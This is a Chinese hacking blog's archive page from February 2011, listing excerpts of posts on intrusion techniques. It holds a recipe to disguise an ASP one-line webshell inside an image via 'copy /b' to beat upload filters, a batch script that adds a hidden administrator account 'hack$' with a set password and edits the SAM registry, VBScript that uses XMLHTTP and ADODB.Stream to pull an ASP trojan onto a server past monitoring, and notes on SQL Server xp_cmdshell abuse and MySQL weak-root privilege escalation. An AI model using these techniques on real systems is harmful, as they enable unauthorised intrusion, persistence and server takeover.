2011年2月27日

解除.exe限制

摘要: 方法一: 1.找到system32目录,将cmd.exe文件改成cmd.com文件(目的是使cmd能够运行, 因为.exe文件不能执行了啊,改成.com可以执行了)。 2.在开始里点击运行,输入cmd,然后回车。 3.在dos内,输入assoc .exe=exefile,然后回车(注意assoc与.exe之间有个空格,assoc是个命令),这样.exe就与.exe的执行文件关联了,再运行.exe文件就可以了。 方法二: 可以通过修改注册表来恢复EXE文件。因为EXE文件都无法打开,所以只有先将 Windows目录下的注册表编辑器“Regedit.exe”改为“Regedit.com”,然后运行 阅读全文

posted @ 2011-02-27 09:00 =_=! 阅读(454) 评论(0) 推荐(0) 编辑

2011年2月26日

上传漏洞分类

该文被密码保护。 阅读全文

posted @ 2011-02-26 17:44 =_=! 阅读(3) 评论(0) 推荐(0) 编辑

图片webshell

该文被密码保护。 阅读全文

posted @ 2011-02-26 12:51 =_=! 阅读(14) 评论(0) 推荐(0) 编辑

图片脚本

摘要: 嘿嘿,大家可能会说,上传漏洞有什么好玩的,但是有时真能遇上好玩的!一个上传漏洞, .NET aspx程序,同时支持asp,可以伪造文件头上传任意脚本文件,你上传上去执行可总是出错,要么是没有闭合,要么就是执行错误,不管你自己闭合,都不行,经过我了解.net文件上传过滤组件,过滤文件头,过滤文件尾。了解原理就好办了1.txt存放你的一句话马2.jpg 为一小图片文件,一定要小,比如qq表情图片3:copy /b 2.jpg+1.txt 3.jpg 这样就伪造了文件头,但是现在传上去还不行,我接下来就用4:copy /b 3.jpg+2.jpg 4.asp ok,现在文件头和文件尾都是正常的图片文 阅读全文

posted @ 2011-02-26 12:40 =_=! 阅读(285) 评论(0) 推荐(0) 编辑

2011年2月25日

SA权限X种上传方法

该文被密码保护。 阅读全文

posted @ 2011-02-25 13:10 =_=! 阅读(3) 评论(0) 推荐(0) 编辑

bat制作超级隐藏帐号

摘要: 一款蛮不错的脚本,免去了到注册表导来导去的麻烦.一段隐藏用户的bat,注意脚本中的$不能去掉.net user hack$ ABCabc123!@# /addnet localgroup administrators hack$ /addEcho HKEY_LOCAL_MACHINE\SAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINE\SAM\SAM [1] >>c:/tem.iniEcho HKEY_LOCAL_MACHINE\SAM\SAM\Domains [1] >>c:/tem.iniEcho HKEY_LOCAL 阅读全文

posted @ 2011-02-25 11:46 =_=! 阅读(222) 评论(0) 推荐(0) 编辑

sa内网渗透

摘要: 下午搞了一个站,存在sa注入点漏洞,window 2000+iis5。通过注入点信息,发现sqlserver版本为7.00,以前见过一次这个版本,不过没有怎么深入研究,朋友扫弱口令扫描到的,当时也提权了,具体忘记了。附图:扫描这个ip地址发现只对外开放了53跟80,韩国的鸟站,由此猜测可能为内网或者外网但是限制了对外开放的端口。一般情况下会开启1433,跟3389的但是限制对外连接。sqlserver7.0的虽然以前搞过,但是忘记具体怎么弄了,于是一步一步的先用穿山甲自带的功能恢复xp_cmdshell,sp_oa**,sp_***job,还有一个sandboxmode沙盒模式。都开启之后,随 阅读全文

posted @ 2011-02-25 09:51 =_=! 阅读(280) 评论(0) 推荐(0) 编辑

2011年2月24日

绕过一流信息监控系统上传Webshell

摘要: 用XMLHTTP 让服务器从空间里下载ASP木马并保存在服务器上,这样就能绕过去了 Set xPost = CreateObject(" Microsoft.XMLHTTP") xPost.Open "GET","http://127.0.0.1/admin.txt",False xPost.Send() Set sGet = CreateObject("ADODB.Stream") sGet.Mode = 3 sGet.Type = 1 sGet.Open() sGet.Write(xPost.responseB 阅读全文

posted @ 2011-02-24 06:20 =_=! 阅读(228) 评论(0) 推荐(0) 编辑

2011年2月22日

MYSQL提权技巧

摘要: 问题对象:有虚拟主机空间商.网站服务器 过程:建立一个表→在表中输入我们的提权内容→出表→完成 1.mysql默认开启3306端口.如果服务器默认密码不设置就是空密码.黑客们就可能利用该弱口令漏洞.来攻击我们的服务器. 2.如果在得到用户名为:root 密码为:(空密码时候),黑客就可以攻击进我们网 阅读全文

posted @ 2011-02-22 17:34 =_=! 阅读(257) 评论(0) 推荐(0) 编辑

上传漏洞利用方法

该文被密码保护。 阅读全文

posted @ 2011-02-22 16:03 =_=! 阅读(2) 评论(0) 推荐(0) 编辑

导航